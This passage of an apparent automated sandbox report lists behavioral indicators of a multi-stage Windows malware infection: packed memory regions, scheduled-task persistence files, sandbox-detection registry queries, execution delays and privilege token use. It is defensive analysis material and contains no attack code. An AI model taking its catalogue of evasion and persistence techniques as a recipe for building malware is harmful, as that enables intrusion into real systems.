behavioral1/memory/5076-620-0x00007FFA37180000-0x00007FFA37194000-memory.dmp upx behavioral1/memory/5076-619-0x00007FFA3BA40000-0x00007FFA3BA59000-memory.dmp upx behavioral1/memory/5076-621-0x00007FFA37160000-0x00007FFA3716B000-memory.dmp upx behavioral1/memory/5076-623-0x00007FFA26C40000-0x00007FFA26D5C000-memory.dmp upx behavioral1/memory/5076-622-0x00007FFA31C20000-0x00007FFA31C46000-memory.dmp upx behavioral1/memory/5076-624-0x00007FFA2D3C0000-0x00007FFA2D403000-memory.dmp upx behavioral1/memory/5076-625-0x00007FFA36F20000-0x00007FFA36F32000-memory.dmp upx behavioral1/memory/5076-630-0x00007FFA273E0000-0x00007FFA274AD000-memory.dmp upx behavioral1/memory/5076-631-0x00007FFA269F0000-0x00007FFA26C39000-memory.dmp upx behavioral1/memory/5076-629-0x00007FFA28300000-0x00007FFA28324000-memory.dmp upx behavioral1/memory/5076-632-0x00007FFA26DF0000-0x00007FFA26EBF000-memory.dmp upx behavioral1/memory/5076-635-0x00007FFA258B0000-0x00007FFA2596C000-memory.dmp upx behavioral1/memory/5076-634-0x00007FFA25970000-0x00007FFA2599E000-memory.dmp upx behavioral1/memory/5076-633-0x00007FFA26D60000-0x00007FFA26DE7000-memory.dmp upx behavioral1/memory/5076-627-0x00007FFA26EC0000-0x00007FFA273E0000-memory.dmp upx behavioral1/memory/5076-626-0x00007FFA32250000-0x00007FFA32283000-memory.dmp upx behavioral1/memory/5076-637-0x00007FFA25880000-0x00007FFA258AB000-memory.dmp upx behavioral1/memory/5076-636-0x00007FFA37180000-0x00007FFA37194000-memory.dmp upx behavioral1/memory/5076-684-0x00007FFA371A0000-0x00007FFA371C3000-memory.dmp upx behavioral1/memory/5076-692-0x00007FFA32250000-0x00007FFA32283000-memory.dmp upx behavioral1/memory/5076-705-0x00007FFA25880000-0x00007FFA258AB000-memory.dmp upx behavioral1/memory/5076-704-0x00007FFA26D60000-0x00007FFA26DE7000-memory.dmp upx behavioral1/memory/5076-703-0x00007FFA25970000-0x00007FFA2599E000-memory.dmp upx behavioral1/memory/5076-702-0x00007FFA28300000-0x00007FFA28324000-memory.dmp upx behavioral1/memory/5076-701-0x00007FFA36F20000-0x00007FFA36F32000-memory.dmp upx behavioral1/memory/5076-700-0x00007FFA2D3C0000-0x00007FFA2D403000-memory.dmp upx behavioral1/memory/5076-699-0x00007FFA258B0000-0x00007FFA2596C000-memory.dmp upx behavioral1/memory/5076-698-0x00007FFA31C20000-0x00007FFA31C46000-memory.dmp upx behavioral1/memory/5076-697-0x00007FFA37160000-0x00007FFA3716B000-memory.dmp upx behavioral1/memory/5076-696-0x00007FFA37180000-0x00007FFA37194000-memory.dmp upx behavioral1/memory/5076-695-0x00007FFA26C40000-0x00007FFA26D5C000-memory.dmp upx behavioral1/memory/5076-694-0x00007FFA26DF0000-0x00007FFA26EBF000-memory.dmp upx behavioral1/memory/5076-693-0x00007FFA269F0000-0x00007FFA26C39000-memory.dmp upx behavioral1/memory/5076-691-0x00007FFA38BC0000-0x00007FFA38BCD000-memory.dmp upx behavioral1/memory/5076-690-0x00007FFA34BB0000-0x00007FFA34BE6000-memory.dmp upx behavioral1/memory/5076-689-0x00007FFA36EC0000-0x00007FFA36EED000-memory.dmp upx behavioral1/memory/5076-688-0x00007FFA372D0000-0x00007FFA372E9000-memory.dmp upx behavioral1/memory/5076-687-0x00007FFA3D5D0000-0x00007FFA3D5DD000-memory.dmp upx behavioral1/memory/5076-686-0x00007FFA3BA40000-0x00007FFA3BA59000-memory.dmp upx behavioral1/memory/5076-685-0x00007FFA273E0000-0x00007FFA274AD000-memory.dmp upx behavioral1/memory/5076-669-0x00007FFA26EC0000-0x00007FFA273E0000-memory.dmp upx behavioral1/memory/5076-658-0x00007FFA259A0000-0x00007FFA25F89000-memory.dmp upx behavioral1/memory/5076-683-0x00007FFA3FEB0000-0x00007FFA3FEBF000-memory.dmp upx -
Drops file in Windows directory 12 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp msedge.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp msedge.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\Tasks\Gxtuum.job zY9sqWs.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp msedge.exe File created C:\Windows\Tasks\rapes.job TempFHZKMSRXYYN80L0BWISIGAVV9VJPO26B.EXE File created C:\Windows\Tasks\futors.job amnew.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp msedge.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0007000000028250-458.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
pid pid_target Process procid_target 4004 3712 WerFault.exe 147 11184 4264 WerFault.exe 225 11664 4028 WerFault.exe 296 24912 14848 WerFault.exe 339 24920 14816 WerFault.exe 340 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a1096309f8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m0wsoI3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8f24a78ca9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qRKxyjRGQ0DR2WdQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LtsbBmOMKouFwcgn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language frameapphost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9r1ngvkngv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f52454a24e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c59f8b1bd4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 741ee2da36.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5a4a70c0e3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language J9HXZRTQVUGD1VAMIAXZT7VXANA87T.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 741ee2da36.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jmyu379zc2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SCHTASKS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UD49QH6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempZL8TWA5DAVIX9WALKPGFIEVO4UJ2AJOU.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language q5Vn4MDNtttD4KVL.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language QNSQC73nbH72joAr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UD49QH6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IIJDBAKKKF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 741ee2da36.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7Bfx0AYRCqL2I5Yz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9sRLB1swy6WmobzJ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7Bd1zjNeuyRVLqDa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cronikxqqq.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 42 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 m0wsoI3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 m0wsoI3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 a459430e67.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString m0wsoI3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString a459430e67.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString m0wsoI3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe -
Delays execution with timeout.exe 5 IoCs
pid Process 5872 timeout.exe 3924 timeout.exe 10184 timeout.exe 10876 timeout.exe 23852 timeout.exe -
Enumerates system info in registry 2 TTPs 27 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 9936 taskkill.exe 4452 taskkill.exe 3484 taskkill.exe 4908 taskkill.exe 4884 taskkill.exe -
Modifies data under HKEY_USERS 6 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133866219387429467" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2123103809-19148277-2527443841-1000\{096900F8-05CE-45D3-A084-13AC0E57684E} msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2123103809-19148277-2527443841-1000\{80F24EB8-9BE4-4E29-8758-38B119C1BF60} msedge.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 348 SCHTASKS.exe 456 schtasks.exe 4408 schtasks.exe 2892 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 8072 explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2668 powershell.exe 2668 powershell.exe 4892 TempFHZKMSRXYYN80L0BWISIGAVV9VJPO26B.EXE 4892 TempFHZKMSRXYYN80L0BWISIGAVV9VJPO26B.EXE 5580 rapes.exe 5580 rapes.exe 3900 UD49QH6.exe 3900 UD49QH6.exe 3900 UD49QH6.exe 3900 UD49QH6.exe 3900 UD49QH6.exe 3900 UD49QH6.exe 3900 UD49QH6.exe 3900 UD49QH6.exe 3900 UD49QH6.exe 3900 UD49QH6.exe 1524 rapes.exe 1524 rapes.exe 1484 powershell.exe 1484 powershell.exe 5428 powershell.exe 5428 powershell.exe 2136 powershell.exe 2136 powershell.exe 4876 powershell.exe 4876 powershell.exe 2828 powershell.exe 2828 powershell.exe 1596 483d2fa8a0d53818306efeb32d3.exe 1596 483d2fa8a0d53818306efeb32d3.exe 4208 TempZL8TWA5DAVIX9WALKPGFIEVO4UJ2AJOU.EXE 4208 TempZL8TWA5DAVIX9WALKPGFIEVO4UJ2AJOU.EXE 3320 chrome.exe 3320 chrome.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1016 rapes.exe 1016 rapes.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 2240 c59f8b1bd4.exe 2240 c59f8b1bd4.exe 1028 taskmgr.exe 2240 c59f8b1bd4.exe 2240 c59f8b1bd4.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1028 taskmgr.exe 8072 explorer.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 15244 SplashWin.exe 14692 cmd.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 24 IoCs
pid Process 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 4904 chrome.exe 4904 chrome.exe 4904 chrome.exe 4560 msedge.exe 4560 msedge.exe 4980 chrome.exe 4980 chrome.exe 4980 chrome.exe 9080 msedge.exe 9080 msedge.exe 11008 chrome.exe 11008 chrome.exe 11008 chrome.exe 11900 msedge.exe 11900 msedge.exe 9168 chrome.exe 9168 chrome.exe 9168 chrome.exe 5056 msedge.exe 5056 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2668 powershell.exe Token: SeImpersonatePrivilege 3900 UD49QH6.exe Token: SeImpersonatePrivilege 3900 UD49QH6.exe Token: SeDebugPrivilege 1484 powershell.exe Token: SeDebugPrivilege 5428 powershell.exe Token: SeDebugPrivilege 2136 powershell.exe Token: SeDebugPrivilege 4876 powershell.exe Token: SeDebugPrivilege 2828 powershell.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeCreatePagefilePrivilege 3320 chrome.exe Token: SeShutdownPrivilege 3320 chrome.exe Token: SeCreatePagefilePrivilege 3320 chrome.exe Token: SeDebugPrivilege 1028 taskmgr.exe Token: SeSystemProfilePrivilege 1028 taskmgr.exe Token: SeCreateGlobalPrivilege 1028 taskmgr.exe Token: SeDebugPrivilege 3712 cronikxqqq.exe Token: SeImpersonatePrivilege 2240 c59f8b1bd4.exe Token: SeImpersonatePrivilege 2240 c59f8b1bd4.exe Token: SeImpersonatePrivilege 3064 cronikxqqq.exe Token: SeImpersonatePrivilege 3064 cronikxqqq.exe Token: SeImpersonatePrivilege 5252 MSBuild.exe Token: SeImpersonatePrivilege 5252 MSBuild.exe Token: SeImpersonatePrivilege 5452 a1096309f8.exe Token: SeShutdownPrivilege 4904 chrome.exe Token: SeCreatePagefilePrivilege 4904 chrome.exe Token: SeImpersonatePrivilege 5452 a1096309f8.exe Token: SeImpersonatePrivilege 6044 crypted.exe Token: SeShutdownPrivilege 4904 chrome.exe Token: SeCreatePagefilePrivilege 4904 chrome.exe Token: SeImpersonatePrivilege 6044 crypted.exe Token: SeShutdownPrivilege 4904 chrome.exe Token: SeCreatePagefilePrivilege 4904 chrome.exe Token: SeShutdownPrivilege 4904 chrome.exe Token: SeCreatePagefilePrivilege 4904 chrome.exe Token: SeShutdownPrivilege 4904 chrome.exe Token: SeCreatePagefilePrivilege 4904 chrome.exe Token: SeShutdownPrivilege 4904 chrome.exe Token: SeCreatePagefilePrivilege 4904 chrome.exe Token: SeImpersonatePrivilege 5456 5a4a70c0e3.exe Token: SeShutdownPrivilege 4904 chrome.exe Token: SeCreatePagefilePrivilege 4904 chrome.exe Token: SeImpersonatePrivilege 5456 5a4a70c0e3.exe Token: SeImpersonatePrivilege 4256 MSBuild.exe Token: SeImpersonatePrivilege 4256 MSBuild.exe Token: SeImpersonatePrivilege 1996 2c7732faec.exe Token: SeImpersonatePrivilege 1996 2c7732faec.exe Token: SeShutdownPrivilege 4980 chrome.exe Token: SeCreatePagefilePrivilege 4980 chrome.exe Token: SeDebugPrivilege 9936 taskkill.exe Token: SeShutdownPrivilege 4980 chrome.exe Token: SeCreatePagefilePrivilege 4980 chrome.exe Token: SeShutdownPrivilege 4980 chrome.exe Token: SeCreatePagefilePrivilege 4980 chrome.exe Token: SeImpersonatePrivilege 4492 MSBuild.exe Token: SeDebugPrivilege 4452 taskkill.exe Token: SeDebugPrivilege 3484 taskkill.exe Token: SeDebugPrivilege 4908 taskkill.exe Token: SeDebugPrivilege 4884 taskkill.exe Token: SeImpersonatePrivilege 4492 MSBuild.exe Token: SeDebugPrivilege 2664 firefox.exe Token: SeDebugPrivilege 2664 firefox.exe Token: SeDebugPrivilege 8216 08fc08f920.exe Token: SeImpersonatePrivilege 7932 UD49QH6.exe Token: SeImpersonatePrivilege 7932 UD49QH6.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3716 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 3716 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 3716 d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe 1716 87a483eddc.exe 1716 87a483eddc.exe 1716 87a483eddc.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 3320 chrome.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 1028 taskmgr.exe 